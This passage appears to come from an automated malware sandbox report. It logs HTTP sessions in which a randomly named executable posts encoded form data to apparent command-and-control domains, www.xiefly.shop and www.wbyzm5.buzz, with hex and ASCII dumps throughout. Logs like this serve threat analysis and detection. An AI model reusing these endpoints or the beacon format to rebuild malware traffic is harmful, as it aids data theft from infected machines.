lmGSpMwGvL9ppMeqViEXCyHuRHgsnCJRr0l6Gv66cq5uilzHcQ8nPSjEXvpeO/JNyqSmXw6xv1
Feb 28, 2024 15:50:06.611938953 CET	5144	OUT	Data Raw: 6c 5a 67 53 6d 46 31 78 4f 58 50 50 47 4c 71 76 39 66 66 5a 77 34 45 50 2b 43 36 64 34 6f 4d 6f 4c 2b 44 41 4a 68 54 41 38 6e 53 53 63 2b 57 66 43 6f 48 6e 5a 79 2b 49 46 52 69 65 6c 55 33 63 50 59 56 66 5a 55 64 57 6c 32 72 76 39 65 68 5a 50 4f Data Ascii: lZgSmF1xOXPPGLqv9ffZw4EP+C6d4oMoL+DAJhTA8nSSc+WfCoHnZy+IFRielU3cPYVfZUdWl2rv9ehZPOLwdpSj8sm6y/q8PKhsgWU5eP9ooEaMKehZ33go4i+6+li6SsVdJ4i88Yl5ogeWmw0RMe232KTgcVBr22Upy4tOMxb+cOb6BFyp/+UWbKkc2BlSV51R6sSTHxKy5AZPHfO+7lS4+bwheKLEzMxr4RdBlngLqDbgcEO
Feb 28, 2024 15:50:06.611989975 CET	6430	OUT	Data Raw: 59 74 41 44 6c 4b 61 77 77 4c 41 71 33 36 4c 50 72 53 6e 6d 73 34 6c 56 6c 58 6f 76 78 53 59 4a 74 36 39 39 6f 6d 45 46 68 4a 7a 72 78 4d 42 72 50 6f 76 69 6d 57 61 6a 30 74 73 5a 35 70 46 48 64 58 49 68 75 61 76 47 79 4d 59 6c 42 65 52 32 58 4b Data Ascii: YtADlKawwLAq36LPrSnms4lVlXovxSYJt699omEFhJzrxMBrPovimWaj0tsZ5pFHdXIhuavGyMYlBeR2XKClzv/oyvneVTLdHlp5AiUSrslE5Mp0EgTttM6TTBeLLt+jGgqz8/A+KEQU6A1qDjZxm7DZJECjK/SHW3LUG5HTFQwj10JXZsbaunK1V1TDCB2y5fQeXKH+hwmgiGxPVH97n4xF118VC23JIwImN2K4Ewkv4arEL+e
Feb 28, 2024 15:50:06.768645048 CET	2572	OUT	Data Raw: 65 43 64 59 6e 36 63 57 44 78 4c 78 70 42 41 69 79 66 72 2b 2f 56 5a 31 57 6c 49 44 51 33 75 54 6d 39 6c 37 57 6e 2f 68 54 7a 33 35 6d 34 34 2b 38 64 76 4d 6f 6b 74 55 45 73 53 6d 58 34 6f 4e 57 4e 31 62 2f 34 32 44 33 79 43 77 38 53 64 45 38 6e Data Ascii: eCdYn6cWDxLxpBAiyfr+/VZ1WlIDQ3uTm9l7Wn/hTz35m44+8dvMoktUEsSmX4oNWN1b/42D3yCw8SdE8nCx5LyKq0V2neiaQWFAhSLjo4Natk6bsGCbawdyJqFIfI8Jz1vrvizG00Vm8LDwqC+g6zTAaH2Pblwtr3zbSI+OQhAEPFDydm9HvJeI//CrtaU0uLJypN2fZA4OfyD8B4/TdcB1YqKuwt+poFubGp4VyEqB7XwJAPZ
Feb 28, 2024 15:50:06.768728018 CET	5144	OUT	Data Raw: 54 47 4c 35 31 2f 6a 76 66 2b 4a 7a 56 47 71 6a 38 44 30 30 62 48 56 4e 70 42 4c 4b 6e 67 43 58 51 4f 55 4e 58 5a 32 71 7a 6c 6e 61 77 2b 4f 71 33 39 54 50 73 35 57 79 6a 36 76 33 6a 35 77 2b 2b 53 57 4d 58 7a 69 56 61 68 7a 64 74 4a 2b 4b 67 66 Data Ascii: TGL51/jvf+JzVGqj8D00bHVNpBLKngCXQOUNXZ2qzlnaw+Oq39TPs5Wyj6v3j5w++SWMXziVahzdtJ+KgfkR2tror1IxpI+2ya5D/4a/7DXWLdqF+4vRBsI25EoYiKBhJLNT2Fl2VVDLD5JCZrwoqzk3qoqd7v69aSf6jtsDHki7HHEHpJRDV84RKtusLGH+1WLHA+tof4i7mhRyZRGEmwL6qb6NMjZW/u5ibU3TTyx5Vk5+GfG
Feb 28, 2024 15:50:06.768955946 CET	6430	OUT	Data Raw: 45 51 44 48 54 32 41 61 59 42 76 30 63 39 33 75 47 2b 63 61 63 30 77 72 4d 65 72 74 6c 2f 4d 43 50 67 75 34 61 69 62 2b 6a 30 4c 47 43 36 68 4b 37 68 6c 50 30 4e 78 4c 44 50 56 32 48 59 55 43 6d 77 74 34 74 43 59 64 5a 4c 62 6c 67 36 4e 45 4e 4d Data Ascii: EQDHT2AaYBv0c93uG+cac0wrMertl/MCPgu4aib+j0LGC6hK7hlP0NxLDPV2HYUCmwt4tCYdZLblg6NENMLCpJY9i/HuormvkqVJNeeqiUxmXnHYeg1Jv0Rz/+op2Z6mNgjzNG0AeHgWDqi/8cXh1PmupGLkaTe3fdl7Bw1KL4ZIRSzpynWLYLpvkDyR3Et8WIZ6BcThUk2ew/CfZX83bIKiZbeUv038uDUtFeO+0M26ZO94yVP
Feb 28, 2024 15:50:06.769187927 CET	11574	OUT	Data Raw: 51 6a 71 53 64 41 56 6a 39 35 48 6f 58 59 45 4d 6c 42 64 38 44 37 72 2f 5a 30 5a 6e 49 38 55 71 47 56 36 52 4c 54 78 68 51 73 2b 67 6c 78 67 78 42 6b 46 78 6d 58 79 78 46 73 38 64 64 2f 63 68 76 6e 33 57 34 30 5a 57 2b 41 58 57 6e 46 70 52 4b 66 Data Ascii: QjqSdAVj95HoXYEMlBd8D7r/Z0ZnI8UqGV6RLTxhQs+glxgxBkFxmXyxFs8dd/chvn3W40ZW+AXWnFpRKf7nGms+sec6Qnsv/vZZE9iDzliWe5wK5oPso5G+JizhUITXbJlicsNnjDqVgLl59m1D8ST/BdASf/9irY33GDKPWLeDPkzk4irhbnYkcA+eSzPyGkEWTqHZydoh6thyfEqIapFfv3fwx2vt8qjgMETKG22d5u3hBX2
Feb 28, 2024 15:50:06.781537056 CET	664	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 28 Feb 2024 14:50:06 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 28 Feb 2024 15:50:06 GMT Location: https://www.wbyzm5.buzz/v3ka/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ImueooMr2kLyYVGaZKP5o77L4jeMXgzk5no1O6Q%2BT%2B11qku9IyMzWgUuP%2FUjj2kQRGU2GFTnCrXl7ufvpqvhObmGt%2FalLKCe2ZanX6Y%2F%2B1feQy5wF5YJvtq1DqWrG8ob2Dg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 85c97a5fdeed14e6-LAX alt-svc: h2=":443"; ma=60 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	50275	172.67.130.3	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:09.297665119 CET	460	OUT	GET /v3ka/?nf8dPP8p=5DSEd0ATp85KgzdkASdwbLRc8+C6g6ShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChqY8Yb6J0jChxi/qqZI=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.wbyzm5.buzz Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:50:09.465389967 CET	785	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 28 Feb 2024 14:50:09 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 28 Feb 2024 15:50:09 GMT Location: https://www.wbyzm5.buzz/v3ka/?nf8dPP8p=5DSEd0ATp85KgzdkASdwbLRc8+C6g6ShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChqY8Yb6J0jChxi/qqZI=&L0=2tHtHNWXtBDdYR Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8ISlRa%2F9AwPIYSyYWj%2BqRyk2keCv7yDsOyt26NzFPRIbuAdG42juiuU1slME0tj5KOmSTKirf7nsOR1AzsOSw3Qd7H3ltZ5KRlF%2F%2BML2l6kG2ombvuXqTzFP9RON4yIEPzg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 85c97a709b8a2b67-LAX alt-svc: h2=":443"; ma=60 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	50277	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:14.644783020 CET	721	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.xiefly.shop Origin: http://www.xiefly.shop Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.xiefly.shop/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 51 50 4c 69 4b 59 68 4c 33 4e 51 30 49 51 58 6d 68 43 75 47 38 6b 50 38 37 77 53 78 72 47 35 51 6a 62 53 61 52 6e 35 38 37 45 31 58 50 4d 63 6b 61 6e 37 4d 46 4f 62 73 33 48 56 73 50 62 75 52 6f 69 31 66 47 58 58 68 46 4b 55 33 39 54 71 47 50 75 32 50 72 36 4b 59 46 30 54 63 69 4b 45 30 31 70 54 79 68 2f 47 6a 6a 53 56 64 6e 74 6c 51 50 47 65 65 67 63 52 46 73 51 4a 4b 49 56 70 49 53 5a 48 2f 41 70 52 4e 6e 66 53 6d 64 54 34 68 43 73 6f 63 75 44 49 77 43 62 56 5a 31 67 49 4c 71 44 2f 59 53 71 43 5a 7a 7a 4f 56 73 6a 51 63 78 4b 69 4e 6b 54 56 66 73 38 42 62 42 48 2b 4d 56 41 3d 3d Data Ascii: nf8dPP8p=QPLiKYhL3NQ0IQXmhCuG8kP87wSxrG5QjbSaRn587E1XPMckan7MFObs3HVsPbuRoi1fGXXhFKU39TqGPu2Pr6KYF0TciKE01pTyh/GjjSVdntlQPGeegcRFsQJKIVpISZH/ApRNnfSmdT4hCsocuDIwCbVZ1gILqD/YSqCZzzOVsjQcxKiNkTVfs8BbBH+MVA==
Feb 28, 2024 15:50:14.821794987 CET	1235	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;br" accept-ranges: bytes content-encoding: br vary: Accept-Encoding content-length: 912 date: Wed, 28 Feb 2024 14:50:14 GMT server: LiteSpeed platform: hostinger Data Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73 3b 6d 0d d6 e2 20 db b2 d4 4c d7 ca 42 c1 47 ba 6e 9b a8 52 22 63 Data Ascii: 3Y\|^zsj+ODs2fG \'C\+JK'^H@iRJi=oqHND!)\|$PJb!2LESI\|5ENTOM%hRs@qr2.xS6LK\|Cf)^[$g&=DT~{cc`Tm0/Cx6[?Mk@IX\$DiB>A4&)MnA=d2HHE0WMGu+7@_!Ysf,t@\ !xj1e[I#G_X/G~[Sv?G)p$K>2u}""a!Kp<C/!~K\O-m"YIx2ymj\|DC;?O&yW^[kc(e"A=,g!kks4eR_IB]Fz@Rpt]To?}:!F,dQ;jGA.V/8dXbtFQ*OwI#6z9G9}>[-fOC")`$0bWi 4`tMNeQSgoSrFJj,4nd5cu"6H'4Ax6]06T.i4 xN&-n1Wy9b,AyJX[(s;m LBGnR"c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	50278	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:17.338767052 CET	1061	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.xiefly.shop Origin: http://www.xiefly.shop Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.xiefly.shop/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 51 50 4c 69 4b 59 68 4c 33 4e 51 30 4a 77 6e 6d 79 6c 43 47 30 6b 50 37 2b 77 53 78 68 6d 35 55 6a 62 57 61 52 6a 4a 73 36 78 64 58 50 74 73 6b 62 69 58 4d 4a 75 62 73 2f 6e 55 6d 43 37 75 65 6f 69 34 6f 47 56 44 68 46 4b 41 33 6e 41 69 47 65 75 32 4d 2b 4b 4b 5a 54 6b 54 42 30 36 45 75 31 70 76 75 68 2b 53 6a 6a 6d 6c 64 31 2b 64 51 46 7a 79 64 33 4d 52 44 71 51 4a 46 43 31 70 43 53 5a 62 4e 41 73 63 36 6e 73 4f 6d 64 7a 59 68 44 73 6f 66 6b 7a 49 72 64 4c 55 36 6b 69 4e 33 79 51 6a 79 63 74 2b 37 2f 6a 79 42 6a 77 6f 76 33 62 36 31 38 77 56 4e 6c 59 6c 4e 50 30 72 65 49 6a 6d 33 42 46 73 6b 69 6f 67 6a 4b 62 65 69 59 33 64 62 43 4e 2b 53 48 33 71 35 7a 67 6e 39 63 49 59 62 76 63 43 67 72 49 55 6f 41 4d 31 63 79 55 62 77 56 37 48 46 32 59 7a 4e 58 37 78 33 4a 62 4c 51 7a 44 39 5a 37 38 61 4e 78 76 6f 52 6c 32 33 73 48 4c 34 48 2f 30 6e 70 6a 38 45 4f 6f 6a 53 61 6d 63 62 42 75 6f 46 6a 45 6a 56 58 43 4d 49 52 79 6d 6c 54 44 2b 4a 31 37 42 56 73 56 35 69 52 39 66 59 68 73 32 47 6e 34 67 38 7a 77 45 2f 2b 4f 79 63 6d 51 6d 7a 7a 6d 52 69 2b 73 4c 64 33 30 5a 38 54 54 75 57 48 51 37 67 4a 59 6b 75 2f 76 48 33 62 53 52 58 73 4e 4c 4d 76 63 54 65 6e 43 55 6f 77 4f 51 42 70 56 6b 35 34 75 42 6e 64 55 37 62 4d 75 74 71 38 67 76 72 69 4e 63 46 58 52 56 63 78 65 6a 36 6d 6d 58 41 67 44 4e 6f 31 68 58 61 4d 6e 66 79 6b 49 6e 78 47 75 7a 6b 52 4c 7a 64 42 43 68 4b 6a 68 59 42 4d 6a 45 74 75 74 35 4f 51 54 7a 4d 38 4a 46 70 59 6a 35 65 58 63 35 67 76 42 56 45 49 55 33 64 61 30 76 41 34 73 32 53 5a 55 5a 48 74 4b 75 35 56 66 2f 38 57 30 51 39 58 6a 75 4d 57 6b 39 6e 57 32 39 64 38 7a 64 59 3d Data Ascii: nf8dPP8p=QPLiKYhL3NQ0JwnmylCG0kP7+wSxhm5UjbWaRjJs6xdXPtskbiXMJubs/nUmC7ueoi4oGVDhFKA3nAiGeu2M+KKZTkTB06Eu1pvuh+Sjjmld1+dQFzyd3MRDqQJFC1pCSZbNAsc6nsOmdzYhDsofkzIrdLU6kiN3yQjyct+7/jyBjwov3b618wVNlYlNP0reIjm3BFskiogjKbeiY3dbCN+SH3q5zgn9cIYbvcCgrIUoAM1cyUbwV7HF2YzNX7x3JbLQzD9Z78aNxvoRl23sHL4H/0npj8EOojSamcbBuoFjEjVXCMIRymlTD+J17BVsV5iR9fYhs2Gn4g8zwE/+OycmQmzzmRi+sLd30Z8TTuWHQ7gJYku/vH3bSRXsNLMvcTenCUowOQBpVk54uBndU7bMutq8gvriNcFXRVcxej6mmXAgDNo1hXaMnfykInxGuzkRLzdBChKjhYBMjEtut5OQTzM8JFpYj5eXc5gvBVEIU3da0vA4s2SZUZHtKu5Vf/8W0Q9XjuMWk9nW29d8zdY=
Feb 28, 2024 15:50:17.507116079 CET	1235	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;br" accept-ranges: bytes content-encoding: br vary: Accept-Encoding content-length: 912 date: Wed, 28 Feb 2024 14:50:17 GMT server: LiteSpeed platform: hostinger Data Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73 3b 6d 0d d6 e2 20 db b2 d4 4c d7 ca 42 c1 47 ba 6e 9b a8 52 22 63 Data Ascii: 3Y\|^zsj+ODs2fG \'C\+JK'^H@iRJi=oqHND!)\|$PJb!2LESI\|5ENTOM%hRs@qr2.xS6LK\|Cf)^[$g&=DT~{cc`Tm0/Cx6[?Mk@IX\$DiB>A4&)MnA=d2HHE0WMGu+7@_!Ysf,t@\ !xj1e[I#G_X/G~[Sv?G)p$K>2u}""a!Kp<C/!~K\O-m"YIx2ymj\|DC;?O&yW^[kc(e"A=,g!kks4eR_IB]Fz@Rpt]To?}:!F,dQ;jGA.V/8dXbtFQ*OwI#6z9G9}>[-fOC")`$0bWi 4`tMNeQSgoSrFJj,4nd5cu"6H'4Ax6]06T.i4 xN&-n1Wy9b,AyJX[(s;m LBGnR"c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	50279	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:20.027205944 CET	10288	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.xiefly.shop Origin: http://www.xiefly.shop Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.xiefly.shop/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 51 50 4c 69 4b 59 68 4c 33 4e 51 30 4a 77 6e 6d 79 6c 43 47 30 6b 50 37 2b 77 53 78 68 6d 35 55 6a 62 57 61 52 6a 4a 73 36 78 46 58 4d 66 55 6b 62 42 50 4d 49 75 62 73 6a 33 55 6c 43 37 75 44 6f 68 49 6b 47 56 66 66 46 4d 4d 33 2b 7a 61 47 65 38 4f 4d 76 36 4b 61 4b 55 54 66 69 4b 45 36 31 70 54 41 68 2b 47 73 6a 53 74 64 6e 70 68 51 4f 67 71 65 76 4d 52 46 71 51 4a 4a 47 31 6f 78 53 5a 50 64 41 73 51 36 6e 75 71 6d 64 41 77 68 47 2f 41 66 70 44 49 30 4c 37 55 31 39 53 4d 50 79 51 6e 2b 63 74 2f 41 2f 69 32 42 6a 79 77 76 30 63 6d 32 39 51 56 4e 73 34 6c 4d 4c 30 58 43 49 6a 37 69 42 47 77 6b 69 6f 49 6a 4c 37 65 69 54 30 46 61 43 74 2f 5a 44 33 71 75 6c 51 62 6c 63 4c 6b 50 76 63 57 67 6f 2b 34 6f 41 2f 64 63 30 33 44 77 4f 37 48 44 35 34 79 58 59 62 78 7a 4a 62 62 39 7a 44 63 69 37 2b 57 4e 7a 4b 63 52 7a 6a 58 7a 54 62 34 37 36 30 6e 34 6e 38 49 30 6f 69 69 65 6d 63 62 52 75 74 39 6a 45 54 4a 58 44 4f 67 65 2f 57 6c 65 4f 65 4a 6b 75 52 5a 32 56 2f 47 6e 39 65 77 78 73 78 2b 6e 2b 41 38 7a 6c 54 6a 35 41 43 63 62 66 47 7a 68 69 52 6a 38 73 4c 52 56 30 64 6c 73 53 66 75 48 4b 72 51 4a 4f 6b 75 34 39 33 33 66 63 78 58 69 4a 4c 4d 76 63 54 54 63 43 52 77 77 4f 69 52 70 56 58 4e 34 34 67 6e 64 57 37 61 46 75 74 71 74 67 76 58 42 4e 63 4d 47 52 55 4d 4c 65 68 57 6d 6c 47 51 67 50 70 45 32 6b 6e 61 44 6a 66 79 2f 56 58 74 64 75 7a 35 63 4c 33 42 33 43 54 4f 6a 67 59 78 4d 6e 45 74 70 6d 35 4f 58 55 7a 4e 33 45 6c 6c 45 6a 35 72 67 63 35 56 69 42 53 34 49 59 42 38 4d 72 64 59 53 76 30 69 